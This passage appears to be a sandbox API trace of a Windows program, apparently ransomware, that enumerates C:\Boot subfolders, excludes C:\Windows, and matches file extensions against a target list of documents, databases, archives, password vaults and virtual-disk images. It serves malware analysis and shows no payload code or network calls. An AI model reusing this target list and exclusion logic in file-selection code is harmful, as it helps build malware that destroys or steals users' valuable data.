pszDest="C:\\Boot\\de-DE\\*") returned="C:\\Boot\\de-DE\\*" [0039.644] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0x54ace0 [0039.732] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.732] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.732] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Boot\\de-DE", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned="C:\\Boot\\de-DE\\bootmgr.exe.mui" [0039.732] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0039.732] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.732] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.732] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0 [0039.732] FindClose (in: hFindFile=0x54ace0 | out: hFindFile=0x54ace0) returned 1 [0039.732] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.732] PathCombineW (in: pszDest=0x2e4e968, pszDir="C:\\Boot", pszFile="el-GR" | out: pszDest="C:\\Boot\\el-GR") returned="C:\\Boot\\el-GR" [0039.733] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Boot\\el-GR") returned 0x0 [0039.733] PathCombineW (in: pszDest=0x2e4e2e0, pszDir="C:\\Boot\\el-GR", pszFile="*" | out: pszDest="C:\\Boot\\el-GR\\*") returned="C:\\Boot\\el-GR\\*" [0039.733] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0x54ace0 [0039.733] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.733] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.733] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Boot\\el-GR", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned="C:\\Boot\\el-GR\\bootmgr.exe.mui" [0039.733] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0039.734] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.734] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.734] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0 [0039.734] FindClose (in: hFindFile=0x54ace0 | out: hFindFile=0x54ace0) returned 1 [0039.734] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.734] PathCombineW (in: pszDest=0x2e4e968, pszDir="C:\\Boot", pszFile="en-US" | out: pszDest="C:\\Boot\\en-US") returned="C:\\Boot\\en-US" [0039.734] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Boot\\en-US") returned 0x0 [0039.734] PathCombineW (in: pszDest=0x2e4e2e0, pszDir="C:\\Boot\\en-US", pszFile="*" | out: pszDest="C:\\Boot\\en-US\\*") returned="C:\\Boot\\en-US\\*" [0039.734] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0x54ace0 [0039.774] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.774] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.775] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Boot\\en-US", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\en-US\\bootmgr.exe.mui") returned="C:\\Boot\\en-US\\bootmgr.exe.mui" [0039.775] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0039.775] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.775] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.775] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.775] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Boot\\en-US", pszFile="memtest.exe.mui" | out: pszDest="C:\\Boot\\en-US\\memtest.exe.mui") returned="C:\\Boot\\en-US\\memtest.exe.mui" [0039.775] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0039.775] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.777] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.777] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0 [0039.777] FindClose (in: hFindFile=0x54ace0 | out: hFindFile=0x54ace0) returned 1 [0039.778] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.778] PathCombineW (in: pszDest=0x2e4e968, pszDir="C:\\Boot", pszFile="es-ES" | out: pszDest="C:\\Boot\\es-ES") returned="C:\\Boot\\es-ES" [0039.778] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Boot\\es-ES") returned 0x0 [0039.778] PathCombineW (in: pszDest=0x2e4e2e0, pszDir="C:\\Boot\\es-ES", pszFile="*" | out: pszDest="C:\\Boot\\es-ES\\*") returned="C:\\Boot\\es-ES\\*" [0039.778] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0x54ace0 [0039.787] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.787] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.787] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Boot\\es-ES", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned="C:\\Boot\\es-ES\\bootmgr.exe.mui" [0039.787] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0039.787] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.787] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.787] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0 [0039.787] FindClose (in: hFindFile=0x54ace0 | out: hFindFile=0x54ace0) returned 1 [0039.787] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.787] PathCombineW (in: pszDest=0x2e4e968, pszDir="C:\\Boot", pszFile="fi-FI" | out: pszDest="C:\\Boot\\fi-FI") returned="C:\\Boot\\fi-FI" [0039.788] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Boot\\fi-FI") returned 0x0 [0039.788] PathCombineW (in: pszDest=0x2e4e2e0, pszDir="C:\\Boot\\fi-FI", pszFile="*" | out: pszDest="C:\\Boot\\fi-FI\\*") returned="C:\\Boot\\fi-FI\\*" [0039.788] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0x54ace0 [0039.788] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.788] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.788] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Boot\\fi-FI", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned="C:\\Boot\\fi-FI\\bootmgr.exe.mui" [0039.788] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0039.789] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.789] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.789] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0 [0039.789] FindClose (in: hFindFile=0x54ace0 | out: hFindFile=0x54ace0) returned 1 [0039.789] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.789] PathCombineW (in: pszDest=0x2e4e968, pszDir="C:\\Boot", pszFile="Fonts" | out: pszDest="C:\\Boot\\Fonts") returned="C:\\Boot\\Fonts" [0039.789] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Boot\\Fonts") returned 0x0 [0039.789] PathCombineW (in: pszDest=0x2e4e2e0, pszDir="C:\\Boot\\Fonts", pszFile="*" | out: pszDest="C:\\Boot\\Fonts\\*") returned="C:\\Boot\\Fonts\\*" [0039.789] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0x54ace0 [0039.797] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.797] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.797] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Boot\\Fonts", pszFile="chs_boot.ttf" | out: pszDest="C:\\Boot\\Fonts\\chs_boot.ttf") returned="C:\\Boot\\Fonts\\chs_boot.ttf" [0039.797] PathFindExtensionW (pszPath="chs_boot.ttf") returned=".ttf" [0039.797] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".ttf.") returned 5 [0039.797] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".ttf.") returned 0x0 [0039.797] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.797] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Boot\\Fonts", pszFile="cht_boot.ttf" | out: pszDest="C:\\Boot\\Fonts\\cht_boot.ttf") returned="C:\\Boot\\Fonts\\cht_boot.ttf" [0039.797] PathFindExtensionW (pszPath="cht_boot.ttf") returned=".ttf" [0039.797] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".ttf.") returned 5 [0039.797] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".ttf.") returned 0x0 [0039.798] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.798] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Boot\\Fonts", pszFile="jpn_boot.ttf" | out: pszDest="C:\\Boot\\Fonts\\jpn_boot.ttf") returned="C:\\Boot\\Fonts\\jpn_boot.ttf" [0039.798] PathFindExtensionW (pszPath="jpn_boot.ttf") returned=".ttf" [0039.798] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".ttf.") returned 5 [0039.798] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".ttf.") returned 0x0 [0039.798] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.798] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Boot\\Fonts", pszFile="kor_boot.ttf" | out: pszDest="C:\\Boot\\Fonts\\kor_boot.ttf") returned="C:\\Boot\\Fonts\\kor_boot.ttf" [0039.798] PathFindExtensionW (pszPath="kor_boot.ttf") returned=".ttf" [0039.798] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".ttf.") returned 5 [0039.798] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".ttf.") returned 0x0 [0039.798] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.798] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Boot\\Fonts", pszFile="wgl4_boot.ttf" | out: pszDest="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned="C:\\Boot\\Fonts\\wgl4_boot.ttf" [0039.798] PathFindExtensionW (pszPath="wgl4_boot.ttf") returned=".ttf" [0039.798] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".ttf.") returned 5 [0039.798] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".ttf.") returned 0x0 [0039.799] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0 [0039.799] FindClose (in: hFindFile=0x54ace0 | out: hFindFile=0x54ace0) returned 1 [0039.799] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.799] PathCombineW (in: pszDest=0x2e4e968, pszDir="C:\\Boot", pszFile="fr-FR" | out: pszDest="C:\\Boot\\fr-FR") returned="C:\\Boot\\fr-FR" [0039.799] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Boot\\fr-FR") returned 0x0 [0039.799] PathCombineW (in: pszDest=0x2e4e2e0, pszDir="C:\\Boot\\fr-FR", pszFile="*" | out: pszDest="C:\\Boot\\fr-FR\\*") returned="C:\\Boot\\fr-FR\\*" [0039.799] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0x54ace0 [0039.801] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.802] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.802] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Boot\\fr-FR", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned="C:\\Boot\\fr-FR\\bootmgr.exe.mui" [0039.802] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0039.802] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.802] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.802] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0 [0039.802] FindClose (in: hFindFile=0x54ace0 | out: hFindFile=0x54ace0) returned 1 [0039.802] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.802] PathCombineW (in: pszDest=0x2e4e968, pszDir="C:\\Boot", pszFile="hu-HU" | out: pszDest="C:\\Boot\\hu-HU") returned="C:\\Boot\\hu-HU" [0039.802] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Boot\\hu-HU") returned 0x0 [0039.802] PathCombineW (in: pszDest=0x2e4e2e0, pszDir="C:\\Boot\\hu-HU", pszFile="*" | out: pszDest="C:\\Boot\\hu-HU\\*") returned="C:\\Boot\\hu-HU\\*" [0039.803] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0x54ace0 [0039.803] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.803] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.804] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Boot\\hu-HU", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned="C:\\Boot\\hu-HU\\bootmgr.exe.mui" [0039.804] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0039.804] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.804] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.804] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0 [0039.804] FindClose (in: hFindFile=0x54ace0 | out: hFindFile=0x54ace0) returned 1 [0039.804] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.804] PathCombineW (in: pszDest=0x2e4e968, pszDir="C:\\Boot", pszFile="it-IT" | out: pszDest="C:\\Boot\\it-IT") returned="C:\\Boot\\it-IT" [0039.804] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Boot\\it-IT") returned 0x0 [0039.805] PathCombineW (in: pszDest=0x2e4e2e0, pszDir="C:\\Boot\\it-IT", pszFile="*" | out: pszDest="C:\\Boot\\it-IT\\*") returned="C:\\Boot\\it-IT\\*" [0039.805] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0x54ace0 [0039.808] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.808] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.808] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Boot\\it-IT", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned="C:\\Boot\\it-IT\\bootmgr.exe.mui" [0039.808] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0039.808] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.808] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.808] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0 [0039.808] FindClose (in: hFindFile=0x54ace0 | out: hFindFile=0x54ace0) returned 1 [0039.808] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.808] PathCombineW (in: pszDest=0x2e4e968, pszDir="C:\\Boot", pszFile="ja-JP" | out: pszDest="C:\\Boot\\ja-JP") returned="C:\\Boot\\ja-JP" [0039.808] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Boot\\ja-JP") returned 0x0 [0039.808] PathCombineW (in: pszDest=0x2e4e2e0, pszDir="C:\\Boot\\ja-JP", pszFile="*" | out: pszDest="C:\\Boot\\ja-JP\\*") returned="C:\\Boot\\ja-JP\\*" [0039.808] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0x54ace0 [0039.809] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.809] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.809] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Boot\\ja-JP", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned="C:\\Boot\\ja-JP\\bootmgr.exe.mui" [0039.809] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0039.809] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.809] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.809] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0 [0039.809] FindClose (in: hFindFile=0x54ace0 | out: hFindFile=0x54ace0) returned 1 [0039.809] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.809] PathCombineW (in: pszDest=0x2e4e968, pszDir="C:\\Boot", pszFile="ko-KR" | out: pszDest="C:\\Boot\\ko-KR") returned="C:\\Boot\\ko-KR" [0039.809] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Boot\\ko-KR") returned 0x0 [0039.810] PathCombineW (in: pszDest=0x2e4e2e0, pszDir="C:\\Boot\\ko-KR", pszFile="*" | out: pszDest="C:\\Boot\\ko-KR\\*") returned="C:\\Boot\\ko-KR\\*" [0039.810] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0x54ace0 [0039.812] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.812] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.812] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Boot\\ko-KR", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned="C:\\Boot\\ko-KR\\bootmgr.exe.mui" [0039.812] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0039.812] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.812] StrStrIW 